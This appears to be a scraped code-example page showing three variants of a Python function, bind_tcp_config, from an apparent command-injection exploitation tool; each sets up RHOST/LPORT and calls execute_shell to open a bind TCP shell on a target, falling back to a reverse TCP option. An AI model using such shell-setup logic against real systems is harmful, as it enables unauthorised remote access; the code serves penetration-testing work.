Example #1
def bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
  settings.BIND_TCP = True
  # Set up RHOST / LPORT for the bind TCP connection.
  if settings.BIND_TCP == False:
    if settings.REVERSE_TCP == True:
      os_shell_option = "reverse_tcp"
      reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
    return go_back, go_back_again

  while True:
    if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS:
      result = checks.check_bind_tcp_options(settings.RHOST)
      cmd = bind_tcp.bind_tcp_options(separator)
      result = checks.check_bind_tcp_options(cmd)
    if result != None:
      if result == 0:
        go_back_again = False
      elif result == 1 or result == 2:
        go_back_again = True
        settings.BIND_TCP = False
      elif result == 3:
        settings.BIND_TCP = False
        reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)  
      return go_back, go_back_again

    # execute bind TCP shell 
    execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
Example #2
def bind_tcp_config(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again):

  settings.BIND_TCP = True
  # Set up RHOST / LPORT for the bind TCP connection.
  bind_tcp.configure_bind_tcp(separator = "")

  if settings.BIND_TCP == False:
    if settings.REVERSE_TCP == True:
      os_shell_option = "reverse_tcp"
      reverse_tcp_config(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
    return go_back, go_back_again

  while True:
    if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS:
      result = checks.check_bind_tcp_options(settings.RHOST)

      cmd = bind_tcp.bind_tcp_options(separator = "")
      result = checks.check_bind_tcp_options(cmd)
    if result != None:
      if result == 0:
        return False
      elif result == 1 or result == 2:
        go_back_again = True
        settings.BIND_TCP = False
      return go_back, go_back_again

    # execute bind TCP shell 
    execute_shell(url, cmd, cve, check_header, filename, os_shell_option)
Example #3
def bind_tcp_config(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again):

  settings.BIND_TCP = True
  # Set up RHOST / LPORT for the bind TCP connection.
  bind_tcp.configure_bind_tcp(separator = "")

  if settings.BIND_TCP == False:
    if settings.REVERSE_TCP == True:
      os_shell_option = "reverse_tcp"
      reverse_tcp_config(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
    return go_back, go_back_again

  while True:
    if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS:
      result = checks.check_bind_tcp_options(settings.RHOST)

      cmd = bind_tcp.bind_tcp_options()
      result = checks.check_bind_tcp_options(cmd)
    if result != None:
      if result == 0:
        return False
      elif result == 1 or result == 2:
        go_back_again = True
        settings.BIND_TCP = False
      return go_back, go_back_again

    # execute bind TCP shell 
    execute_shell(url, cmd, cve, check_header, filename, os_shell_option)